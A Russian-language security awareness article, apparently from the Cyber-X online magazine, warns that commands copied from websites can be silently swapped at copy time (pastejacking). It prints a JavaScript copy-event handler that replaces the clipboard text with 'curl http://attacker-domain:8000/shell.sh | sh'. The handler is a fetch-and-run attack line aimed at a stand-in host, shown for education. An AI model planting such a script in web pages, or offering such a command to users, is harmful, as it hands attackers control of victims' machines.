Атака на системы – копирование и вставка команд с сайтов и форумов

Многие из нас привыкли копировать команды с сайтов и форумов, а затем вставлять их в терминал и выполнять. Это могут быть команды для устранения каких либо неурядиц системы, кастомизация, установка программного обеспечения, добавления репозиториев и так далее.

Таким образом можно скомпрометировать свою систему, заразить ее каким нибудь бэкдором, то есть, стать жертвой злоумышленников. В командах с сайтов и форумах может скрываться не то, что на первый взгляд вам кажется, в итоге, копируя команды вы можете выполнить установку какого нибудь вредоносного программного обеспечения или исполняющего скрипта. В этом вы убедитесь чуть ниже.

Спросите любого системного администратора, продвинутого или начинающего пользователя Linux, копировал ли он команды с сайтов? И ответ, скорее всего, да. Да что там, многие так делают, даже не задумываясь о последствиях.

Компрометация системы

Предположим, вы первый раз установили систему Linux из семейства Debian, пошли в сеть в поисках информации как обновить систему и на каком то не известном сайте наткнулись на команду. Копируете ее с этого сайта и вставляете в терминал, нажимаете “Enter”, вводите пароль, и в результате можете стать жертвой злоумышленников. Пример этому приведен ниже, скопируйте команду которую вы видите и вставьте ее например в обычный блокнот:

sudo apt update && sudo apt upgrade

Забавно, не так ли? Вместо привычной команды вы получили совершенно иное. Это наглядный пример того, как ваша система может стать целью хакеров.

Вся загадка тут кроется в JS (JavaScript) коде, который скрывается под обычной командой:

<script>
document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl http://attacker-domain:8000/shell.sh | sh\n'); e.preventDefault(); });
</script>

Копируя команды и выполняя их в терминале, вы крайне рискуете, эта команда выше показана как наглядный пример. В некоторых системах Linux после копирования и вставки в терминал, происходит выполнение команды автоматически, так что даже если заметили подмену команды, может быть уже поздно.

Хакер может и вовсе скрыть выполнение посторонней команды, к примеру за вереницей длинных команд в итоге, вы даже не поймете что устанавливаете в свою систему. Как вариант:

sudo apt install mariadb-server php libapache2-mod-php php-mysql php-curl php-mcrypt php-cgi php-gd php-mbstring phpmyadmin

А ведь команды бывают и намного больше, и среди этой вереницы, вместе с нужным программным обеспечением может быть скачена и установка вредоносная программа как вариант, майнер, бэкдор или кейлогер. И не факт, что вы это заметите, так как установка может происходить в фоновом режиме.

Заключение

Что бы избежать подобной атаки на вашу систему, и не стать жертвой хакера или иного злоумышленника, не копируйте команды с сайтов и форумов. Все команды вводите только вручную, а если все же скопировали команду, то перед ее выполнением вставляете ее в какой-нибудь текстовый редактор и внимательно изучите ее прежде чем выполнять.

Габриэль Фридландер, специалист по информационной безопасности, основатель обучающей платформы Wizer и автор данного скрипта, на сайте www.wizer-training.com прекрасно продемонстрировал данный тип атаки, при желании, вы можете ознакомиться с его трудами перейдя по этой ссылке.

Так же рекомендую ознакомится со статьей по частым ошибкам кибербезопасности, которые желательно взять на заметку.

А на этом сегодня все, если статья оказалась вам полезна, подписывайтесь на рассылку журнала в pdf формате, а так же на социальные сети журнала Cyber-X:

YouTube
ВКонтакте
Telegram
Twitter
Tumblr

Юморилка, Telegram канал с анекдотами:
Telegram

По вопросам работы сайта, сотрудничества, а так же по иным возникшим вопросам пишите на E-Mail. Если вам нравится журнал и вы хотите отблагодарить за труды, вы можете перечислить донат на развитие проекта.

С уважением, редакция журнала Cyber-X